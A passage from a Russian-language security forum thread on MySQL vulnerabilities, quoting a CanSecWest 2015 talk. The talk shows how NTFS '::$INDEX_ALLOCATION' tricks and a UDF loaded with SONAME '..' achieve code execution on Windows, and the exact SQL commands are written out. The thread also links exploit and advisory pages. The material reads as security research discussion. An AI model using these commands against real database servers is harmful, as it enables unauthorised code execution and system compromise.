Старый 26.03.2015, 16:38   #11
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

+ SynQ

Баге 3 года вроде как.

Или есть принципиальные различия ?

http://www.exploit-db.com/exploits/23077/
__________________
Первый VPN на основе Эллиптической криптографии. Телепортируйся в любой момент, будь невидимым с multi-vpn.biz
И да, это реклама. Просто очень нужен VPN.
BigBear вне форума   Ответить с цитированием
Старый 27.03.2015, 10:28   #12
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

BigBear
Там другой баг и он вероятно давно (тогда же) и закрыт.
SynQ вне форума   Ответить с цитированием
Старый 29.03.2015, 13:38   #13
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Из презентации Yang Yu @tombkeeper:
CanSecWest 2015 - Sexrets of LoadLibrary

Как добавить свой плагин, если путь до plugin_dir не существует.
Цитата:
For NTFS, when you create a file if “$INDEX_ALLOCATION” is appended to the filename, a directory will be created instead.

C:\>dir /w "C:\MySQL\lib\plugin"
The system cannot find the file specified.

mysql> select 'x' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION';
ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION'
(Errcode: 22)

mysql> select 'x' into dumpfile 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
ERROR 3 (HY000): Error writing file 'C:\MySQL\lib\plugin::$INDEX_ALLOCATION'
(Errcode: 22)

C:\>dir /w C:\MySQL\lib\plugin
Volume in drive C is Windows
Volume Serial Number is 4CFA-24AB

Directory of C:\MySQL\lib\plugin
...
Цитата:
Suppose the installation directory is “C:\MySQL”, and %plugin_dir% point to a non-existent directory at:
C:\MySQL\lib\plugin
We could create a UDF DLL called “lib”, which is:
C:\MySQL\lib

Then we use “..” as file name to create a UDF:
mysql> create function exec returns string soname '..';

“..” will be appended to the end of the %plugin_dir%: C:\MySQL\lib\plugin\..

After going through the preprocessing function in the MySQL, the final path passed into the LoadLibraryEx() API points to the file we have just created:
C:\MySQL\lib
SynQ вне форума   Ответить с цитированием
Старый 12.09.2016, 13:38   #14
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

http://legalhackers.com/advisories/M...2016-6662.html
SynQ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot